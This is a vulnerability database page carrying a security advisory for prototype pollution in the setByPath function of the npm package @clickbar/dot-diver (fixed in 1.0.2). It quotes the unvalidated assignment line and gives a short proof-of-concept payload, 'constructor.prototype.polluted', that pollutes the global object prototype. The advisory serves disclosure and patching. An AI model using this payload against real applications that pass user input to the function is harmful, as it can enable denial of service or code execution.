GHSA-9w5f-mw3p-pj47

    Dashboard / Vulnerabilities / GHSA-9w5f-mw3p-pj47

    GHSA-9w5f-mw3p-pj47

    Published: 3 Nov 2023Last Modified: 8 Nov 2023

    Summary: Prototype Pollution(PP) vulnerability in setByPath

    Details: ### Summary There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE. ### Details ```javascript //https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277 // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value ``` In this code, there is no validation for Prototpye Pollution. ### PoC ```javascript import { getByPath, setByPath } from '@clickbar/dot-diver' console.log({}.polluted); // undefined setByPath({},'constructor.prototype.polluted', 'foo'); console.log({}.polluted); // foo ``` ### Impact It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc. ### Credits Team : NodeBoB 최지혁 ( Jihyeok Choi ) 이동하 ( Lee Dong Ha of ZeroPointer Lab ) 강성현    ( kang seonghyeun ) 박성진    ( sungjin park ) 김찬호    ( Chanho Kim ) 이수영    ( Lee Su Young ) 김민욱    ( MinUk Kim )

    Affected packages

    Package

    Name: @clickbar/dot-diver

    Purl: pkg:npm/%40clickbar/dot-diver

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -1.0.2

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-9w5f-mw3p-pj47 | CVE-DB